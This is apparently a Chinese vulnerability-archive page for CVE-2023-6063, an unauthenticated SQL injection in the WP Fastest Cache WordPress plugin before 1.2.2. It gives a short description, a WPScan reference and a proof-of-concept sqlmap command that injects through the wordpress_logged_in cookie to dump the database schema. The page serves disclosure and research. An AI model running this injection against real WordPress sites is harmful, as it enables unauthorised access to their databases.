关联漏洞
标题:
WordPress plugin WP Fastest Cache 安全漏洞
(CVE-2023-6063)
描述:WordPress和WordPress plugin都是WordPress基金会的产品。WordPress是一套使用PHP语言开发的博客平台。该平台支持在PHP和MySQL的服务器上架设个人博客网站。WordPress plugin是一个应用插件。 WordPress plugin WP Fastest Cache 1.2.2 版本之前存在安全漏洞,该漏洞源于在 SQL 语句中使用参数之前未正确清理和转义参数,从而导致未经身份验证的用户可利用 SQL 注入。
描述
CVE-2023-6063 (WP Fastest Cache < 1.2.2 - UnAuth SQL Injection)
介绍
# CVE-2023-6063 PoC
## Reference
- [Unauthenticated SQL Injection Vulnerability Addressed in WP Fastest Cache 1.2.2 | WPScan](https://wpscan.com/blog/unauthenticated-sql-injection-vulnerability-addressed-in-wp-fastest-cache-1-2-2/)
## Plugin setting
Enable "WP Fastest Cache".

## PoC
The "wordpress_logged_in" cookie parameter is vulnerable.
```
$ python sqlmap.py --dbms=mysql -u "http://127.0.0.1/wp-login.php" --cookie='wordpress_logged_in=*' --level=2 --schema
```

文件快照
[4.0K] /data/pocs/af9f4a8f207eb3c5ac65ec5da204d491fe20d906
├── [263K] image_1.png
├── [157K] image_2.png
└── [ 528] README.md
0 directories, 3 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。